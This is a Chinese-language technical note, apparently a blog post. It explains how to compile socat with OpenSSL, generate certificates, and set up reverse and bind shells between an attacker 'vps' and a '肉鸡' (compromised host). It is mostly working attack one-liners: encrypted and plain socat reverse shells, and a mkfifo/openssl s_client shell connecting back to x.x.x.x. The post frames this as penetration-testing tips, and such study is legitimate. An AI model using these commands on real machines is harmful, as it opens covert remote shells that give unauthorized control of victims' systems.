编译环境
#cetos8
yum install gcc-c++
yum install openssl-devel -y
yum install make -y
yum install readline-devel -y
wget http://www.dest-unreach.org/socat/download/socat-1.7.4.4.tar.gz
tar -zxvf socat-1.7.4.4.tar.gz
cd socat-1.7.4.4 & ./configure --enable-openssl-method
make
# 查看版本
./socat -V
# 运行
Ubuntu 18.04.6 LTS 正常
CentOS Linux 8 正常
CentOS Stream9 报错 无法执行二进制文件,可执行文件格式错误
Ubuntu 20.04.5 LTS 报错:error while loading shared libraries: libreadline.so.7: cannot open shared object file
# 官方文档
http://www.dest-unreach.org/socat/doc/socat-openssltunnel.html
http://www.dest-unreach.org/socat/doc/socat.html#ADDRESS_OPENSSL_LISTEN
http://www.dest-unreach.org/socat/doc/CHANGES
证书生成
FILENAME=filename
openssl genrsa -out $FILENAME.key 2048
openssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt
#[Common Name]设置为vps的外网ip
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
socat加密反弹shell
# 加密正向shell,可交互,但ctrl+c会退出shell
vps: ./socat openssl-listen:4433,reuseaddr,cert=filename.pem,cafile=filename.crt system:bash,pty,stderr
肉鸡: ./socat readline openssl:x.x.x.x:4433,cert=filename.pem,cafile=filename.crt
# 加密反弹shell,可交互,但ctrl+c会退出shell
vps: ./socat readline openssl-listen:4433,reuseaddr,cert=filename.pem,cafile=filename.crt
肉鸡: ./socat openssl:x.x.x.x:4433,cert=filename.pem,cafile=filename.crt system:bash,pty,stderr
#反弹shell,稳定的终端
vps:socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
反弹:socat OPENSSL:x.x.x.x:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

socat未加密反弹shell
./socat file:tty,raw,echo=0 tcp-listen:4433
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:x.x.x.x:4433


openssl加密反弹shell
# 在vps上生成SSL证书的公钥/私钥对
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# 在vps上监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
# 在肉鸡上执行反弹
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect x.x.x.x:80 > /tmp/s; rm /tmp/s
#tips:
https://www.freebuf.com/articles/web/328278.html 关于渗透测试中的shell那些事
https://blog.maxkit.com.tw/2021/11/socat.html
https://tw.coderbridge.com/questions/3534af0968df4025a68916df1c5de76c
Comments NOTHING